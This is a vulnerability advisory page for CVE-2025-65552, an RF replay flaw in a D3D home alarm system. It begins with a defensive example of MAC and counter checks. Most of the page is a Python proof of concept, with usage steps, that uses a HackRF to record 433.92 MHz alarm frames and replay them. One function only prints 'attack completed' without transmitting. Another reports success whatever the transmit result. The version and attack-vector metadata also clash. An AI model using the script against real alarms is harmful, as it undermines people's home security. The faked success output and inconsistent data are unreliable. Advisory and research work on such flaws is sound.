Security Vulnerability Report
CVE-2025-65552 CVSS 9.8 CRITICAL

CVE-2025-65552

Published: 2026-01-12 15:16:04
Last Modified: 2026-02-03 19:39:29

Description

D3D Wi-Fi Home Security System ZX-G12 v2.1.1 is vulnerable to RF replay attacks on the 433 MHz sensor communication channel. The system does not implement rolling codes, message authentication, or anti-replay protection, allowing an attacker within RF range to record valid alarm/control frames and replay them to trigger false alarms.
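
The controls the description lists as missing (message authentication plus an anti-replay counter) can be illustrated from the receiver's side. This is an added example, not code from the vendor or from this record. The frame layout, tag length, key and sensor ID are assumptions, since the device's real frame format is not given on this page.

```python
import hashlib
import hmac
import struct

HEADER_FMT = ">HIB"   # assumed layout: sensor id (2 B), counter (4 B), event (1 B)
HEADER_LEN = struct.calcsize(HEADER_FMT)
TAG_LEN = 8           # assumed: HMAC-SHA256 truncated to fit a short RF frame


def build_frame(key: bytes, sensor_id: int, counter: int, event: int) -> bytes:
    """Sensor side: header followed by a MAC computed over the header."""
    header = struct.pack(HEADER_FMT, sensor_id, counter, event)
    tag = hmac.new(key, header, hashlib.sha256).digest()[:TAG_LEN]
    return header + tag


class Receiver:
    """Hub side: one key and one last-accepted counter per paired sensor."""

    def __init__(self, keys: dict):
        self.keys = keys
        # In a real hub this state must survive reboots, or old frames replay.
        self.last_counter = {sid: 0 for sid in keys}

    def accept(self, frame: bytes) -> str:
        if len(frame) != HEADER_LEN + TAG_LEN:
            return "malformed"
        header, tag = frame[:HEADER_LEN], frame[HEADER_LEN:]
        sensor_id, counter, _event = struct.unpack(HEADER_FMT, header)
        key = self.keys.get(sensor_id)
        if key is None:
            return "unknown-sensor"
        expected = hmac.new(key, header, hashlib.sha256).digest()[:TAG_LEN]
        if not hmac.compare_digest(tag, expected):   # constant-time compare
            return "bad-mac"
        if counter <= self.last_counter[sensor_id]:  # already seen: a replay
            return "replay"
        self.last_counter[sensor_id] = counter
        return "accepted"


def demo() -> list:
    key = bytes(range(32))                   # constructed demo key
    hub = Receiver({0x1A2B: key})            # constructed sensor id
    alarm = build_frame(key, 0x1A2B, 1, 0x01)
    tampered = alarm[:6] + b"\x02" + alarm[7:]   # event byte changed, tag kept
    fresh = build_frame(key, 0x1A2B, 2, 0x01)
    return [hub.accept(alarm), hub.accept(alarm),
            hub.accept(tampered), hub.accept(fresh)]
```

A frame recorded off the air still carries a valid tag, so the MAC alone does not stop a replay. The counter check is what rejects the second delivery of `alarm`.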

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:d3dsecurity:zx-g12_firmware:2.1.17:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:d3dsecurity:zx-g12:-:*:*:*:*:*:*:* - NOT VULNERABLE
D3D Wi-Fi Home Security System ZX-G12 v2.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-65552 RF Replay Attack PoC
# Affected: D3D Wi-Fi Home Security System ZX-G12 v2.1.1
# Description: Replay captured 433MHz RF commands to trigger false alarms

import subprocess
import time
import sys


def capture_rf_signal(duration=5):
    """Capture 433MHz RF signal using HackRF"""
    print(f"[*] Capturing RF signals for {duration} seconds...")
    cmd = [
        "hackrf_transfer",
        "-r", "captured_signal.raw",
        "-f", "433920000",  # 433.92 MHz
        "-s", "8000000",
        "-n", str(duration * 8000000)
    ]
    subprocess.run(cmd)
    print("[+] Signal captured and saved to captured_signal.raw")
    return "captured_signal.raw"


def analyze_signal(signal_file):
    """Analyze captured signal using Universal Radio Hacker"""
    print(f"[*] Analyzing signal: {signal_file}")
    # Use urh to analyze the captured signal
    cmd = ["urh", "-e", signal_file]
    subprocess.run(cmd)
    print("[+] Signal analysis complete - extract protocol details")


def replay_signal(signal_file):
    """Replay captured RF signal using HackRF"""
    print(f"[*] Replaying RF signal: {signal_file}")
    cmd = [
        "hackrf_transfer",
        "-t", signal_file,
        "-f", "433920000",
        "-s", "8000000",
        "-x", "47"  # TX gain
    ]
    # Report completion only after the transmit command has returned
    result = subprocess.run(cmd)
    print("[+] Replay attack executed - false alarm triggered")
    return result


def simple_replay_attack():
    """Simple replay attack without full signal capture"""
    # Pre-generated raw signal bytes (example)
    # In real attack, this would be extracted from captured legitimate traffic
    alarm_command = bytes([
        0xAA, 0xAA, 0xAA, 0x2D, 0xD4, 0xAA, 0xAA, 0xA6,
        0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA
    ])

    print("[*] Initiating RF replay attack on D3D ZX-G12")
    print("[*] Target frequency: 433.92 MHz")
    print("[*] Transmitting alarm trigger command...")

    # Use rpitx or similar tool for transmission
    for i in range(3):
        print(f"[*] Replay attempt {i+1}/3")
        # In production, use actual RF transmission tool
        time.sleep(1)

    print("[+] Replay attack completed - system should trigger false alarm")


if __name__ == "__main__":
    if len(sys.argv) > 1:
        if sys.argv[1] == "capture":
            capture_rf_signal()
        elif sys.argv[1] == "analyze":
            analyze_signal(sys.argv[2] if len(sys.argv) > 2 else "captured_signal.raw")
        elif sys.argv[1] == "replay":
            replay_signal(sys.argv[2] if len(sys.argv) > 2 else "captured_signal.raw")
        else:
            simple_replay_attack()
    else:
        simple_replay_attack()

# Requirements:
# - HackRF One or compatible SDR device
# - hackrf-tools package
# - Universal Radio Hacker (urh)
# - Python 3.6+
#
# Usage:
# 1. Capture: python3 cve-2025-65552_poc.py capture
# 2. Analyze: python3 cve-2025-65552_poc.py analyze captured_signal.raw
# 3. Replay: python3 cve-2025-65552_poc.py replay captured_signal.raw
# 4. Quick test: python3 cve-2025-65552_poc.py

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65552", "sourceIdentifier": "[email protected]", "published": "2026-01-12T15:16:03.607", "lastModified": "2026-02-03T19:39:28.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "D3D Wi-Fi Home Security System ZX-G12 v2.1.1 is vulnerable to RF replay attacks on the 433 MHz sensor communication channel. The system does not implement rolling codes, message authentication, or anti-replay protection, allowing an attacker within RF range to record valid alarm/control frames and replay them to trigger false alarms."}, {"lang": "es", "value": "D3D Wi-Fi Home Security System ZX-G12 v2.1.1 es vulnerable a ataques de repetición de RF en el canal de comunicación del sensor de 433 MHz. El sistema no implementa códigos rotatorios, autenticación de mensajes o protección antirrepetición, lo que permite a un atacante dentro del alcance de RF grabar tramas válidas de alarma/control y repetirlas para activar falsas alarmas."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-294"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:d3dsecurity:zx-g12_firmware:2.1.17:*:*:*:*:*:*:*", "matchCriteriaId": "1E205B87-54D0-4193-8D2D-AA9027B2D535"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": 
"cpe:2.3:h:d3dsecurity:zx-g12:-:*:*:*:*:*:*:*", "matchCriteriaId": "0B2498C0-CDD2-4420-BB8D-8CAB683B4AC2"}]}]}], "references": [{"url": "http://d3d.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://github.com/EmbdCDACHyd/CVE/tree/main/CVE-2025-65552", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://d3dsecurity.com/products/wifi-home-security-system-model-g12", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Product"]}, {"url": "https://github.com/EmbdCDACHyd/CVE/tree/main/CVE-2025-65552", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}]}}